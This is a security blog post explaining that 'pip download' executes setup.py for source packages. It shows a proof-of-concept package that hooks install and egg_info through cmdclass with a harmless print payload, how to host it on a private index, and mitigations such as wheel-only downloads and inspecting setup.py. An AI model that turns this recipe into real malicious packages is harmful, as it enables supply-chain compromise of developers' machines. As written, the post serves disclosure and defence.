Malicious Python Packages and Code Execution via pip download
This week I learned about a design flaw in pip download that allows an adversary to run arbitrary code.
I had assumed that running pip install means anything could happen, but code execution from pip download is more surprising.
Both seem useful for red teaming though.
Background
This started with a post by Yehuda Gelb titled Automatic Execution of Code Upon Package Download on Python Package Manager, which the Security Now! podcast pointed me towards.
The post highlights that just running pip download can compromise your computer.
It turns out that this behavior has been known since at least 2014, based on a pip GitHub issue named Avoid generating metadata in pip download, which raised this concern.
Let’s investigate this more closely.
Authoring a Python package
I had never built a Python package before, but the process is well documented. There are different ways to go about it, and the vulnerability exists when using the older setup.py variation and when the package is distributed as a .tar.gz file.
There is a basic project I put together on GitHub:
git clone https://github.com/wunderwuzzi23/this_is_fine_wuzzi
The key piece, which took a few minutes to work out (Stack Overflow is your friend), was how to specify a command to run.
The way I went about it (there may be others) is to include cmdclass in the setup() call, which causes pip to execute the provided command class on both download and install of the package.
...
cmdclass={
    'install' : RunInstallCommand,
    'egg_info': RunEggInfoCommand
},
...
My demo just runs a print command:
...
def RunCommand():
    print("Hello, p0wnd!")

class RunInstallCommand(install):
    def run(self):
        RunCommand()
        install.run(self)
...
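The snippets above elide the egg_info hook, which is the part that matters for pip download. What follows is a minimal sketch of how the two command classes could fit together, not the actual code from the repository: the body of RunEggInfoCommand, the lower-case run_command helper, and the CMDCLASS name are my assumptions for illustration. It needs setuptools installed.

```python
# Sketch of the elided parts of a setup.py; the class bodies are assumptions.
from setuptools.command.egg_info import egg_info
from setuptools.command.install import install


def run_command():
    # Harmless stand-in for whatever an attacker would actually execute.
    print("Hello, p0wnd!")


class RunEggInfoCommand(egg_info):
    """Hooks metadata generation, the step pip performs for an sdist."""

    def run(self):
        run_command()
        egg_info.run(self)


class RunInstallCommand(install):
    """Hooks the install step, mirroring the snippet above."""

    def run(self):
        run_command()
        install.run(self)


# In a real setup.py this mapping would be passed as setup(..., cmdclass=CMDCLASS).
CMDCLASS = {
    "install": RunInstallCommand,
    "egg_info": RunEggInfoCommand,
}
```

Keep in mind that setup.py is an ordinary Python script, so any top-level statement in it would also run when pip executes the file; cmdclass is just one tidy way to attach the payload.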
Now, we are good to go.
Building the package
The next step is to bundle it up in a package, which is done using:
python -m build
This will create a ./dist/ folder containing the wheel and tar.gz files.
For this demo exploit we are only interested in the tar.gz file.
In case you encounter errors while building, make sure the setuptools and build packages are installed.
Hosting the package using pypi-server
Now it’s time to host the package on a server.
To test this out, I decided to host the package on my own test pypi-server.
pypi-server run -v -p 8080 ./packages
Then copy the tar.gz file to your pypi-server’s ./packages folder.
The screenshot above shows how this looks once running.
Download or Install the package
Using the --index-url option, it’s possible to point pip to an alternate package server, which is what we can leverage to test this out:
pip download this_is_fine_wuzzi --index-url http://amstrad:8080 --trusted-host amstrad -v
And our code will now run as part of this.
Notes:
- Messages printed to the console won’t be shown unless you specify -v.
- The --trusted-host option was added because this was a quick demo test. If you have a TLS connection with a valid certificate, it is not needed.
There are tons of ways this can be abused; think of Jupyter notebooks or Google Colab, for example.
Mitigations
The setup.py is only executed if the package is in tar.gz format. So the options are either to review the tar file or to make sure a wheel file (.whl) is present and used.
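One way to make sure a wheel is used is pip's --only-binary option, which tells pip to refuse source distributions. The helper below is a small sketch that only assembles the command line; the function name, the default destination folder, and the example host are assumptions for illustration.

```python
import sys


def wheel_only_download_cmd(package, dest="./wheels", index_url=None):
    """Build a `pip download` command that refuses source distributions."""
    cmd = [
        sys.executable, "-m", "pip", "download",
        "--only-binary", ":all:",  # accept wheels only, for dependencies too
        "--dest", dest,
    ]
    if index_url:
        cmd += ["--index-url", index_url]
    cmd.append(package)
    return cmd


# Usage (hypothetical host taken from the demo above):
#   import subprocess
#   subprocess.run(wheel_only_download_cmd("this_is_fine_wuzzi",
#                                          index_url="http://amstrad:8080"),
#                  check=True)
```

With this option pip should fail with an error when only a tar.gz is offered, rather than falling back to running setup.py.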
You can enumerate the offered packages via https://packagemanager/simple/<package-name>.
This way one can see what files are hosted for the package (tar, wheel, or both), and download (e.g. with wget) and inspect the tar.gz file if that is the only option.
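The enumeration step can be scripted. The sketch below assumes the index serves the usual simple-index HTML page, where each hosted file is an anchor whose text is the filename; classify_files and the parser class are names I made up for illustration, and fetching the page (for example with urllib.request.urlopen) is left to the caller.

```python
from html.parser import HTMLParser


class _AnchorTextParser(HTMLParser):
    """Collects the text content of every <a> element."""

    def __init__(self):
        super().__init__()
        self._in_anchor = False
        self.filenames = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._in_anchor = True
            self.filenames.append("")

    def handle_endtag(self, tag):
        if tag == "a":
            self._in_anchor = False

    def handle_data(self, data):
        if self._in_anchor:
            self.filenames[-1] += data


def classify_files(simple_page_html):
    """Split the files listed on a /simple/<package-name> page by type."""
    parser = _AnchorTextParser()
    parser.feed(simple_page_html)
    parser.close()
    names = [name.strip() for name in parser.filenames if name.strip()]
    return {
        "wheels": [n for n in names if n.endswith(".whl")],
        "sdists": [n for n in names if n.endswith(".tar.gz")],
    }
```

If the "wheels" list comes back empty, pip has nothing but the tar.gz to work with, which is the case that deserves a manual look.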
Conclusions
Having pip download execute arbitrary code is quite unexpected, and it is easy for an attacker to reproduce and perform.
Make sure to inspect packages before you download or install them using pip.
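As a starting point for such an inspection, here is a rough sketch that reads setup.py out of a tar.gz that was fetched by other means (e.g. wget) and reports which commands it overrides through cmdclass, without executing anything. The function name is hypothetical, and this is only a heuristic: a setup.py can run arbitrary code at the top level without touching cmdclass, so an empty result does not mean the package is safe.

```python
import ast
import tarfile


def find_cmdclass_overrides(sdist_path):
    """Return the command names overridden via cmdclass in an sdist's setup.py."""
    with tarfile.open(sdist_path, "r:gz") as archive:
        # An sdist normally keeps setup.py directly under its top-level folder.
        member = next(
            (m for m in archive.getmembers()
             if m.isfile() and m.name.count("/") == 1
             and m.name.endswith("/setup.py")),
            None,
        )
        if member is None:
            return []
        source = archive.extractfile(member).read().decode("utf-8", errors="replace")

    # Parse only; the untrusted code is never executed.
    tree = ast.parse(source)
    overrides = []
    for node in ast.walk(tree):
        if (isinstance(node, ast.keyword) and node.arg == "cmdclass"
                and isinstance(node.value, ast.Dict)):
            for key in node.value.keys:
                if isinstance(key, ast.Constant) and isinstance(key.value, str):
                    overrides.append(key.value)
    return overrides
```

For the demo package above I would expect this to report both install and egg_info, which is a good hint to read the file by hand before going any further.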